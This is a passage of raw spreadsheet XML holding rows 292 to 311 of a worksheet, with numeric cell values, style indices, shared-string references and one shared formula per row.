        <v>1.0</v>
      </c>
      <c r="H292" s="29">
        <v>8815.0</v>
      </c>
      <c r="I292" s="29">
        <v>172846.0</v>
      </c>
      <c r="J292" s="15"/>
      <c r="K292" s="29">
        <v>172846.0</v>
      </c>
      <c r="L292" s="15"/>
      <c r="M292" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N292" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O292" s="29">
        <v>1.0</v>
      </c>
      <c r="P292" s="29">
        <v>6.0</v>
      </c>
      <c r="Q292" s="15"/>
      <c r="R292" s="15"/>
      <c r="S292" s="15"/>
      <c r="T292" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U292" s="5"/>
      <c r="V292" s="5"/>
      <c r="W292" s="47"/>
      <c r="X292" s="45"/>
      <c r="Y292" s="45"/>
      <c r="Z292" s="38" t="s">
        <v>1968</v>
      </c>
      <c r="AA292" s="39" t="s">
        <v>1969</v>
      </c>
      <c r="AB292" s="38" t="s">
        <v>1970</v>
      </c>
      <c r="AC292" s="40">
        <v>181470.0</v>
      </c>
      <c r="AD292" s="5"/>
      <c r="AE292" s="14"/>
      <c r="AF292" s="14"/>
    </row>
    <row r="293">
      <c r="A293" s="6">
        <f t="shared" si="1"/>
        <v>0.343821403</v>
      </c>
      <c r="B293" s="29">
        <v>1.0</v>
      </c>
      <c r="C293" s="29">
        <v>90186.0</v>
      </c>
      <c r="D293" s="14"/>
      <c r="E293" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F293" s="14"/>
      <c r="G293" s="29">
        <v>3.0</v>
      </c>
      <c r="H293" s="29">
        <v>295.0</v>
      </c>
      <c r="I293" s="29">
        <v>21323.0</v>
      </c>
      <c r="J293" s="15"/>
      <c r="K293" s="29">
        <v>21323.0</v>
      </c>
      <c r="L293" s="15"/>
      <c r="M293" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N293" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O293" s="29">
        <v>4.0</v>
      </c>
      <c r="P293" s="29">
        <v>2.0</v>
      </c>
      <c r="Q293" s="15"/>
      <c r="R293" s="15"/>
      <c r="S293" s="15"/>
      <c r="T293" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U293" s="5"/>
      <c r="V293" s="5"/>
      <c r="W293" s="47"/>
      <c r="X293" s="45"/>
      <c r="Y293" s="45"/>
      <c r="Z293" s="38" t="s">
        <v>1971</v>
      </c>
      <c r="AA293" s="39" t="s">
        <v>1972</v>
      </c>
      <c r="AB293" s="38" t="s">
        <v>1973</v>
      </c>
      <c r="AC293" s="40">
        <v>90159.0</v>
      </c>
      <c r="AD293" s="5"/>
      <c r="AE293" s="14"/>
      <c r="AF293" s="14"/>
    </row>
    <row r="294">
      <c r="A294" s="6">
        <f t="shared" si="1"/>
        <v>0.3901981173</v>
      </c>
      <c r="B294" s="29">
        <v>1.0</v>
      </c>
      <c r="C294" s="15"/>
      <c r="D294" s="14"/>
      <c r="E294" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F294" s="14"/>
      <c r="G294" s="29">
        <v>6.0</v>
      </c>
      <c r="H294" s="29">
        <v>33137.0</v>
      </c>
      <c r="I294" s="29">
        <v>52817.0</v>
      </c>
      <c r="J294" s="15"/>
      <c r="K294" s="29">
        <v>8340.0</v>
      </c>
      <c r="L294" s="15"/>
      <c r="M294" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N294" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O294" s="29">
        <v>1.0</v>
      </c>
      <c r="P294" s="29">
        <v>8.0</v>
      </c>
      <c r="Q294" s="15"/>
      <c r="R294" s="15"/>
      <c r="S294" s="15"/>
      <c r="T294" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U294" s="5"/>
      <c r="V294" s="5"/>
      <c r="W294" s="47"/>
      <c r="X294" s="45"/>
      <c r="Y294" s="45"/>
      <c r="Z294" s="38" t="s">
        <v>1974</v>
      </c>
      <c r="AA294" s="39" t="s">
        <v>1975</v>
      </c>
      <c r="AB294" s="38" t="s">
        <v>1976</v>
      </c>
      <c r="AC294" s="40">
        <v>64171.0</v>
      </c>
      <c r="AD294" s="5"/>
      <c r="AE294" s="14"/>
      <c r="AF294" s="14"/>
    </row>
    <row r="295">
      <c r="A295" s="6">
        <f t="shared" si="1"/>
        <v>0.1192810319</v>
      </c>
      <c r="B295" s="29">
        <v>1.0</v>
      </c>
      <c r="C295" s="29">
        <v>15974.0</v>
      </c>
      <c r="D295" s="14"/>
      <c r="E295" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F295" s="14"/>
      <c r="G295" s="29">
        <v>4.0</v>
      </c>
      <c r="H295" s="29">
        <v>6533.0</v>
      </c>
      <c r="I295" s="29">
        <v>10571.0</v>
      </c>
      <c r="J295" s="15"/>
      <c r="K295" s="29">
        <v>10571.0</v>
      </c>
      <c r="L295" s="15"/>
      <c r="M295" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N295" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O295" s="29">
        <v>3.0</v>
      </c>
      <c r="P295" s="29">
        <v>1.0</v>
      </c>
      <c r="Q295" s="15"/>
      <c r="R295" s="15"/>
      <c r="S295" s="15"/>
      <c r="T295" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U295" s="5"/>
      <c r="V295" s="5"/>
      <c r="W295" s="47"/>
      <c r="X295" s="45"/>
      <c r="Y295" s="45"/>
      <c r="Z295" s="38" t="s">
        <v>1977</v>
      </c>
      <c r="AA295" s="39" t="s">
        <v>1978</v>
      </c>
      <c r="AB295" s="38" t="s">
        <v>1777</v>
      </c>
      <c r="AC295" s="40">
        <v>15967.0</v>
      </c>
      <c r="AD295" s="5"/>
      <c r="AE295" s="14"/>
      <c r="AF295" s="14"/>
    </row>
    <row r="296">
      <c r="A296" s="6">
        <f t="shared" si="1"/>
        <v>0.3858563849</v>
      </c>
      <c r="B296" s="29">
        <v>1.0</v>
      </c>
      <c r="C296" s="29">
        <v>151401.0</v>
      </c>
      <c r="D296" s="14"/>
      <c r="E296" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F296" s="14"/>
      <c r="G296" s="29">
        <v>0.0</v>
      </c>
      <c r="H296" s="29">
        <v>106.0</v>
      </c>
      <c r="I296" s="29">
        <v>133337.0</v>
      </c>
      <c r="J296" s="15"/>
      <c r="K296" s="29">
        <v>133337.0</v>
      </c>
      <c r="L296" s="15"/>
      <c r="M296" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N296" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O296" s="29">
        <v>1.0</v>
      </c>
      <c r="P296" s="29">
        <v>0.0</v>
      </c>
      <c r="Q296" s="15"/>
      <c r="R296" s="15"/>
      <c r="S296" s="15"/>
      <c r="T296" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U296" s="5"/>
      <c r="V296" s="5"/>
      <c r="W296" s="47"/>
      <c r="X296" s="45"/>
      <c r="Y296" s="45"/>
      <c r="Z296" s="38" t="s">
        <v>1979</v>
      </c>
      <c r="AA296" s="39" t="s">
        <v>1980</v>
      </c>
      <c r="AB296" s="38" t="s">
        <v>1788</v>
      </c>
      <c r="AC296" s="40">
        <v>151400.0</v>
      </c>
      <c r="AD296" s="5"/>
      <c r="AE296" s="14"/>
      <c r="AF296" s="14"/>
    </row>
    <row r="297">
      <c r="A297" s="6">
        <f t="shared" si="1"/>
        <v>0.8004211039</v>
      </c>
      <c r="B297" s="29">
        <v>1.0</v>
      </c>
      <c r="C297" s="14"/>
      <c r="D297" s="14"/>
      <c r="E297" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F297" s="14"/>
      <c r="G297" s="29">
        <v>-1.0</v>
      </c>
      <c r="H297" s="29">
        <v>124.0</v>
      </c>
      <c r="I297" s="29">
        <v>246031.0</v>
      </c>
      <c r="J297" s="15"/>
      <c r="K297" s="15"/>
      <c r="L297" s="15"/>
      <c r="M297" s="15"/>
      <c r="N297" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O297" s="29">
        <v>1.0</v>
      </c>
      <c r="P297" s="29">
        <v>0.0</v>
      </c>
      <c r="Q297" s="15"/>
      <c r="R297" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S297" s="15"/>
      <c r="T297" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U297" s="5"/>
      <c r="V297" s="5"/>
      <c r="W297" s="47"/>
      <c r="X297" s="45"/>
      <c r="Y297" s="45"/>
      <c r="Z297" s="38" t="s">
        <v>1981</v>
      </c>
      <c r="AA297" s="39" t="s">
        <v>1982</v>
      </c>
      <c r="AB297" s="38" t="s">
        <v>1983</v>
      </c>
      <c r="AC297" s="40">
        <v>241097.0</v>
      </c>
      <c r="AD297" s="5"/>
      <c r="AE297" s="14"/>
      <c r="AF297" s="14"/>
    </row>
    <row r="298">
      <c r="A298" s="6">
        <f t="shared" si="1"/>
        <v>0.8922998905</v>
      </c>
      <c r="B298" s="29">
        <v>1.0</v>
      </c>
      <c r="C298" s="29">
        <v>29104.0</v>
      </c>
      <c r="D298" s="14"/>
      <c r="E298" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F298" s="14"/>
      <c r="G298" s="29">
        <v>4.0</v>
      </c>
      <c r="H298" s="29">
        <v>897.0</v>
      </c>
      <c r="I298" s="29">
        <v>6939.0</v>
      </c>
      <c r="J298" s="15"/>
      <c r="K298" s="29">
        <v>-1.0</v>
      </c>
      <c r="L298" s="15"/>
      <c r="M298" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N298" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O298" s="29">
        <v>2.0</v>
      </c>
      <c r="P298" s="29">
        <v>0.0</v>
      </c>
      <c r="Q298" s="15"/>
      <c r="R298" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S298" s="15"/>
      <c r="T298" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U298" s="5"/>
      <c r="V298" s="5"/>
      <c r="W298" s="47"/>
      <c r="X298" s="45"/>
      <c r="Y298" s="45"/>
      <c r="Z298" s="38" t="s">
        <v>1984</v>
      </c>
      <c r="AA298" s="39" t="s">
        <v>1985</v>
      </c>
      <c r="AB298" s="38" t="s">
        <v>1672</v>
      </c>
      <c r="AC298" s="40">
        <v>29101.0</v>
      </c>
      <c r="AD298" s="5"/>
      <c r="AE298" s="14"/>
      <c r="AF298" s="14"/>
    </row>
    <row r="299">
      <c r="A299" s="6">
        <f t="shared" si="1"/>
        <v>0.5477316704</v>
      </c>
      <c r="B299" s="29">
        <v>1.0</v>
      </c>
      <c r="C299" s="15"/>
      <c r="D299" s="14"/>
      <c r="E299" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F299" s="14"/>
      <c r="G299" s="29">
        <v>20.0</v>
      </c>
      <c r="H299" s="29">
        <v>6349.0</v>
      </c>
      <c r="I299" s="29">
        <v>131774.0</v>
      </c>
      <c r="J299" s="15"/>
      <c r="K299" s="29">
        <v>54387.0</v>
      </c>
      <c r="L299" s="15"/>
      <c r="M299" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N299" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O299" s="29">
        <v>5.0</v>
      </c>
      <c r="P299" s="29">
        <v>5.0</v>
      </c>
      <c r="Q299" s="15"/>
      <c r="R299" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S299" s="15"/>
      <c r="T299" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U299" s="5"/>
      <c r="V299" s="5"/>
      <c r="W299" s="45"/>
      <c r="X299" s="45"/>
      <c r="Y299" s="45"/>
      <c r="Z299" s="38" t="s">
        <v>1986</v>
      </c>
      <c r="AA299" s="39" t="s">
        <v>1987</v>
      </c>
      <c r="AB299" s="38" t="s">
        <v>1988</v>
      </c>
      <c r="AC299" s="40">
        <v>143736.0</v>
      </c>
      <c r="AD299" s="5"/>
      <c r="AE299" s="14"/>
      <c r="AF299" s="14"/>
    </row>
    <row r="300">
      <c r="A300" s="6">
        <f t="shared" si="1"/>
        <v>0.3480853485</v>
      </c>
      <c r="B300" s="29">
        <v>1.0</v>
      </c>
      <c r="C300" s="15"/>
      <c r="D300" s="14"/>
      <c r="E300" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F300" s="14"/>
      <c r="G300" s="29">
        <v>0.0</v>
      </c>
      <c r="H300" s="29">
        <v>139.0</v>
      </c>
      <c r="I300" s="29">
        <v>40727.0</v>
      </c>
      <c r="J300" s="15"/>
      <c r="K300" s="29">
        <v>42391.0</v>
      </c>
      <c r="L300" s="15"/>
      <c r="M300" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N300" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O300" s="29">
        <v>1.0</v>
      </c>
      <c r="P300" s="29">
        <v>4.0</v>
      </c>
      <c r="Q300" s="15"/>
      <c r="R300" s="15"/>
      <c r="S300" s="15"/>
      <c r="T300" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U300" s="5"/>
      <c r="V300" s="5"/>
      <c r="W300" s="47"/>
      <c r="X300" s="45"/>
      <c r="Y300" s="45"/>
      <c r="Z300" s="38" t="s">
        <v>1989</v>
      </c>
      <c r="AA300" s="39" t="s">
        <v>1990</v>
      </c>
      <c r="AB300" s="38" t="s">
        <v>1991</v>
      </c>
      <c r="AC300" s="40">
        <v>264172.0</v>
      </c>
      <c r="AD300" s="5"/>
      <c r="AE300" s="14"/>
      <c r="AF300" s="14"/>
    </row>
    <row r="301">
      <c r="A301" s="6">
        <f t="shared" si="1"/>
        <v>0.730746666</v>
      </c>
      <c r="B301" s="29">
        <v>1.0</v>
      </c>
      <c r="C301" s="14"/>
      <c r="D301" s="14"/>
      <c r="E301" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F301" s="14"/>
      <c r="G301" s="29">
        <v>6.0</v>
      </c>
      <c r="H301" s="29">
        <v>188.0</v>
      </c>
      <c r="I301" s="29">
        <v>78684.0</v>
      </c>
      <c r="J301" s="15"/>
      <c r="K301" s="29">
        <v>49936.0</v>
      </c>
      <c r="L301" s="15"/>
      <c r="M301" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N301" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O301" s="29">
        <v>1.0</v>
      </c>
      <c r="P301" s="29">
        <v>0.0</v>
      </c>
      <c r="Q301" s="15"/>
      <c r="R301" s="15"/>
      <c r="S301" s="15"/>
      <c r="T301" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U301" s="5"/>
      <c r="V301" s="5"/>
      <c r="W301" s="47"/>
      <c r="X301" s="45"/>
      <c r="Y301" s="45"/>
      <c r="Z301" s="38" t="s">
        <v>1992</v>
      </c>
      <c r="AA301" s="39" t="s">
        <v>1993</v>
      </c>
      <c r="AB301" s="38" t="s">
        <v>1994</v>
      </c>
      <c r="AC301" s="40">
        <v>91732.0</v>
      </c>
      <c r="AD301" s="5"/>
      <c r="AE301" s="14"/>
      <c r="AF301" s="14"/>
    </row>
    <row r="302">
      <c r="A302" s="6">
        <f t="shared" si="1"/>
        <v>0.01107640133</v>
      </c>
      <c r="B302" s="29">
        <v>1.0</v>
      </c>
      <c r="C302" s="15"/>
      <c r="D302" s="14"/>
      <c r="E302" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F302" s="14"/>
      <c r="G302" s="29">
        <v>0.0</v>
      </c>
      <c r="H302" s="29">
        <v>67.0</v>
      </c>
      <c r="I302" s="29">
        <v>97016.0</v>
      </c>
      <c r="J302" s="15"/>
      <c r="K302" s="29">
        <v>97016.0</v>
      </c>
      <c r="L302" s="15"/>
      <c r="M302" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N302" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O302" s="29">
        <v>0.0</v>
      </c>
      <c r="P302" s="29">
        <v>4.0</v>
      </c>
      <c r="Q302" s="15"/>
      <c r="R302" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S302" s="15"/>
      <c r="T302" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U302" s="5"/>
      <c r="V302" s="5"/>
      <c r="W302" s="47"/>
      <c r="X302" s="45"/>
      <c r="Y302" s="45"/>
      <c r="Z302" s="38" t="s">
        <v>1995</v>
      </c>
      <c r="AA302" s="39" t="s">
        <v>1996</v>
      </c>
      <c r="AB302" s="38" t="s">
        <v>1997</v>
      </c>
      <c r="AC302" s="40">
        <v>163585.0</v>
      </c>
      <c r="AD302" s="5"/>
      <c r="AE302" s="14"/>
      <c r="AF302" s="14"/>
    </row>
    <row r="303">
      <c r="A303" s="6">
        <f t="shared" si="1"/>
        <v>0.4116325483</v>
      </c>
      <c r="B303" s="29">
        <v>1.0</v>
      </c>
      <c r="C303" s="29">
        <v>140067.0</v>
      </c>
      <c r="D303" s="14"/>
      <c r="E303" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F303" s="14"/>
      <c r="G303" s="29">
        <v>54.0</v>
      </c>
      <c r="H303" s="29">
        <v>9511.0</v>
      </c>
      <c r="I303" s="29">
        <v>108679.0</v>
      </c>
      <c r="J303" s="15"/>
      <c r="K303" s="29">
        <v>61948.0</v>
      </c>
      <c r="L303" s="15"/>
      <c r="M303" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N303" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O303" s="29">
        <v>4.0</v>
      </c>
      <c r="P303" s="29">
        <v>8.0</v>
      </c>
      <c r="Q303" s="15"/>
      <c r="R303" s="15"/>
      <c r="S303" s="15"/>
      <c r="T303" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U303" s="5"/>
      <c r="V303" s="5"/>
      <c r="W303" s="47"/>
      <c r="X303" s="45"/>
      <c r="Y303" s="45"/>
      <c r="Z303" s="38" t="s">
        <v>1998</v>
      </c>
      <c r="AA303" s="39" t="s">
        <v>1999</v>
      </c>
      <c r="AB303" s="38" t="s">
        <v>2000</v>
      </c>
      <c r="AC303" s="40">
        <v>140064.0</v>
      </c>
      <c r="AD303" s="5"/>
      <c r="AE303" s="14"/>
      <c r="AF303" s="14"/>
    </row>
    <row r="304">
      <c r="A304" s="6">
        <f t="shared" si="1"/>
        <v>0.6027819463</v>
      </c>
      <c r="B304" s="29">
        <v>1.0</v>
      </c>
      <c r="C304" s="29">
        <v>162356.0</v>
      </c>
      <c r="D304" s="14"/>
      <c r="E304" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F304" s="14"/>
      <c r="G304" s="29">
        <v>2.0</v>
      </c>
      <c r="H304" s="29">
        <v>1471.0</v>
      </c>
      <c r="I304" s="29">
        <v>60138.0</v>
      </c>
      <c r="J304" s="15"/>
      <c r="K304" s="29">
        <v>6253.0</v>
      </c>
      <c r="L304" s="15"/>
      <c r="M304" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N304" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O304" s="29">
        <v>2.0</v>
      </c>
      <c r="P304" s="29">
        <v>0.0</v>
      </c>
      <c r="Q304" s="15"/>
      <c r="R304" s="15"/>
      <c r="S304" s="15"/>
      <c r="T304" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U304" s="5"/>
      <c r="V304" s="5"/>
      <c r="W304" s="47"/>
      <c r="X304" s="45"/>
      <c r="Y304" s="45"/>
      <c r="Z304" s="38" t="s">
        <v>2001</v>
      </c>
      <c r="AA304" s="39" t="s">
        <v>2002</v>
      </c>
      <c r="AB304" s="38" t="s">
        <v>2003</v>
      </c>
      <c r="AC304" s="40">
        <v>162349.0</v>
      </c>
      <c r="AD304" s="5"/>
      <c r="AE304" s="14"/>
      <c r="AF304" s="14"/>
    </row>
    <row r="305">
      <c r="A305" s="6">
        <f t="shared" si="1"/>
        <v>0.9970405339</v>
      </c>
      <c r="B305" s="29">
        <v>1.0</v>
      </c>
      <c r="C305" s="15"/>
      <c r="D305" s="14"/>
      <c r="E305" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F305" s="14"/>
      <c r="G305" s="29">
        <v>8.0</v>
      </c>
      <c r="H305" s="29">
        <v>303.0</v>
      </c>
      <c r="I305" s="29">
        <v>971.0</v>
      </c>
      <c r="J305" s="15"/>
      <c r="K305" s="29">
        <v>-1.0</v>
      </c>
      <c r="L305" s="15"/>
      <c r="M305" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N305" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O305" s="29">
        <v>2.0</v>
      </c>
      <c r="P305" s="29">
        <v>1.0</v>
      </c>
      <c r="Q305" s="15"/>
      <c r="R305" s="15"/>
      <c r="S305" s="15"/>
      <c r="T305" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U305" s="5"/>
      <c r="V305" s="5"/>
      <c r="W305" s="47"/>
      <c r="X305" s="45"/>
      <c r="Y305" s="45"/>
      <c r="Z305" s="38" t="s">
        <v>2004</v>
      </c>
      <c r="AA305" s="39" t="s">
        <v>2005</v>
      </c>
      <c r="AB305" s="38" t="s">
        <v>2006</v>
      </c>
      <c r="AC305" s="40">
        <v>87332.0</v>
      </c>
      <c r="AD305" s="5"/>
      <c r="AE305" s="14"/>
      <c r="AF305" s="14"/>
    </row>
    <row r="306">
      <c r="A306" s="6">
        <f t="shared" si="1"/>
        <v>0.96917483</v>
      </c>
      <c r="B306" s="29">
        <v>1.0</v>
      </c>
      <c r="C306" s="15"/>
      <c r="D306" s="14"/>
      <c r="E306" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F306" s="14"/>
      <c r="G306" s="29">
        <v>4.0</v>
      </c>
      <c r="H306" s="29">
        <v>885.0</v>
      </c>
      <c r="I306" s="29">
        <v>971.0</v>
      </c>
      <c r="J306" s="15"/>
      <c r="K306" s="15"/>
      <c r="L306" s="15"/>
      <c r="M306" s="15"/>
      <c r="N306" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O306" s="29">
        <v>3.0</v>
      </c>
      <c r="P306" s="29">
        <v>11.0</v>
      </c>
      <c r="Q306" s="15"/>
      <c r="R306" s="15"/>
      <c r="S306" s="15"/>
      <c r="T306" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U306" s="5"/>
      <c r="V306" s="5"/>
      <c r="W306" s="47"/>
      <c r="X306" s="45"/>
      <c r="Y306" s="45"/>
      <c r="Z306" s="38" t="s">
        <v>2007</v>
      </c>
      <c r="AA306" s="39" t="s">
        <v>2008</v>
      </c>
      <c r="AB306" s="38" t="s">
        <v>2009</v>
      </c>
      <c r="AC306" s="40">
        <v>129798.0</v>
      </c>
      <c r="AD306" s="5"/>
      <c r="AE306" s="14"/>
      <c r="AF306" s="14"/>
    </row>
    <row r="307">
      <c r="A307" s="6">
        <f t="shared" si="1"/>
        <v>0.1538190562</v>
      </c>
      <c r="B307" s="29">
        <v>1.0</v>
      </c>
      <c r="C307" s="29">
        <v>258708.0</v>
      </c>
      <c r="D307" s="14"/>
      <c r="E307" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F307" s="14"/>
      <c r="G307" s="29">
        <v>0.0</v>
      </c>
      <c r="H307" s="29">
        <v>297.0</v>
      </c>
      <c r="I307" s="29">
        <v>272669.0</v>
      </c>
      <c r="J307" s="15"/>
      <c r="K307" s="29">
        <v>6253.0</v>
      </c>
      <c r="L307" s="15"/>
      <c r="M307" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N307" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O307" s="29">
        <v>1.0</v>
      </c>
      <c r="P307" s="29">
        <v>3.0</v>
      </c>
      <c r="Q307" s="15"/>
      <c r="R307" s="15"/>
      <c r="S307" s="15"/>
      <c r="T307" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U307" s="5"/>
      <c r="V307" s="5"/>
      <c r="W307" s="47"/>
      <c r="X307" s="45"/>
      <c r="Y307" s="45"/>
      <c r="Z307" s="38" t="s">
        <v>2010</v>
      </c>
      <c r="AA307" s="39" t="s">
        <v>2011</v>
      </c>
      <c r="AB307" s="38" t="s">
        <v>2012</v>
      </c>
      <c r="AC307" s="40">
        <v>258706.0</v>
      </c>
      <c r="AD307" s="5"/>
      <c r="AE307" s="14"/>
      <c r="AF307" s="14"/>
    </row>
    <row r="308">
      <c r="A308" s="6">
        <f t="shared" si="1"/>
        <v>0.02280157954</v>
      </c>
      <c r="B308" s="29">
        <v>1.0</v>
      </c>
      <c r="C308" s="14"/>
      <c r="D308" s="14"/>
      <c r="E308" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F308" s="14"/>
      <c r="G308" s="29">
        <v>2.0</v>
      </c>
      <c r="H308" s="29">
        <v>155.0</v>
      </c>
      <c r="I308" s="29">
        <v>47100.0</v>
      </c>
      <c r="J308" s="15"/>
      <c r="K308" s="15"/>
      <c r="L308" s="15"/>
      <c r="M308" s="15"/>
      <c r="N308" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O308" s="29">
        <v>2.0</v>
      </c>
      <c r="P308" s="29">
        <v>4.0</v>
      </c>
      <c r="Q308" s="15"/>
      <c r="R308" s="15"/>
      <c r="S308" s="15"/>
      <c r="T308" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U308" s="5"/>
      <c r="V308" s="5"/>
      <c r="W308" s="45"/>
      <c r="X308" s="45"/>
      <c r="Y308" s="45"/>
      <c r="Z308" s="38" t="s">
        <v>2013</v>
      </c>
      <c r="AA308" s="39" t="s">
        <v>2014</v>
      </c>
      <c r="AB308" s="38" t="s">
        <v>2015</v>
      </c>
      <c r="AC308" s="40">
        <v>142341.0</v>
      </c>
      <c r="AD308" s="5"/>
      <c r="AE308" s="14"/>
      <c r="AF308" s="14"/>
    </row>
    <row r="309">
      <c r="A309" s="6">
        <f t="shared" si="1"/>
        <v>0.2093699388</v>
      </c>
      <c r="B309" s="29">
        <v>1.0</v>
      </c>
      <c r="C309" s="15"/>
      <c r="D309" s="14"/>
      <c r="E309" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F309" s="14"/>
      <c r="G309" s="29">
        <v>-1.0</v>
      </c>
      <c r="H309" s="29">
        <v>185.0</v>
      </c>
      <c r="I309" s="29">
        <v>31903.0</v>
      </c>
      <c r="J309" s="5" t="s">
        <v>2016</v>
      </c>
      <c r="L309" s="15"/>
      <c r="M309" s="15"/>
      <c r="N309" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O309" s="29">
        <v>1.0</v>
      </c>
      <c r="P309" s="29">
        <v>0.0</v>
      </c>
      <c r="Q309" s="15"/>
      <c r="R309" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S309" s="15"/>
      <c r="T309" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U309" s="5"/>
      <c r="V309" s="5"/>
      <c r="W309" s="47"/>
      <c r="X309" s="45"/>
      <c r="Y309" s="45"/>
      <c r="Z309" s="38" t="s">
        <v>2017</v>
      </c>
      <c r="AA309" s="39" t="s">
        <v>1541</v>
      </c>
      <c r="AB309" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC309" s="40">
        <v>44324.0</v>
      </c>
      <c r="AD309" s="5"/>
      <c r="AE309" s="14"/>
      <c r="AF309" s="14"/>
    </row>
    <row r="310">
      <c r="A310" s="6">
        <f t="shared" si="1"/>
        <v>0.8541364907</v>
      </c>
      <c r="B310" s="29">
        <v>1.0</v>
      </c>
      <c r="C310" s="29">
        <v>138612.0</v>
      </c>
      <c r="D310" s="14"/>
      <c r="E310" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F310" s="14"/>
      <c r="G310" s="29">
        <v>0.0</v>
      </c>
      <c r="H310" s="29">
        <v>467.0</v>
      </c>
      <c r="I310" s="29">
        <v>35724.0</v>
      </c>
      <c r="J310" s="15"/>
      <c r="K310" s="29">
        <v>35724.0</v>
      </c>
      <c r="L310" s="15"/>
      <c r="M310" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N310" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O310" s="29">
        <v>2.0</v>
      </c>
      <c r="P310" s="29">
        <v>2.0</v>
      </c>
      <c r="Q310" s="15"/>
      <c r="R310" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S310" s="15"/>
      <c r="T310" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U310" s="5"/>
      <c r="V310" s="5"/>
      <c r="W310" s="47"/>
      <c r="X310" s="45"/>
      <c r="Y310" s="45"/>
      <c r="Z310" s="38" t="s">
        <v>2018</v>
      </c>
      <c r="AA310" s="39" t="s">
        <v>2019</v>
      </c>
      <c r="AB310" s="38" t="s">
        <v>1584</v>
      </c>
      <c r="AC310" s="40">
        <v>138611.0</v>
      </c>
      <c r="AD310" s="5"/>
      <c r="AE310" s="14"/>
      <c r="AF310" s="14"/>
    </row>
    <row r="311">
      <c r="A311" s="6">
        <f t="shared" si="1"/>
        <v>0.9315078596</v>
      </c>
      <c r="B311" s="29">
        <v>1.0</v>
      </c>
      <c r="C311" s="15"/>
      <c r="D311" s="14"/>
      <c r="E311" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F311" s="14"/>
      <c r="G311" s="29">
        <v>5.0</v>
      </c>
      <c r="H311" s="29">
        <v>463.0</v>
      </c>
      <c r="I311" s="29">
        <v>94449.0</v>
      </c>
      <c r="J311" s="15"/>
      <c r="K311" s="29">
        <v>-1.0</v>
      </c>
      <c r="L311" s="15"/>
      <c r="M311" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N311" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O311" s="29">
        <v>2.0</v>
      </c>
      <c r="P311" s="29">
        <v>10.0</v>
      </c>
      <c r="Q311" s="15"/>
      <c r="R311" s="15"/>
      <c r="S311" s="15"/>
      <c r="T311" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U311" s="5"/>
      <c r="V311" s="5"/>
      <c r="W311" s="47"/>
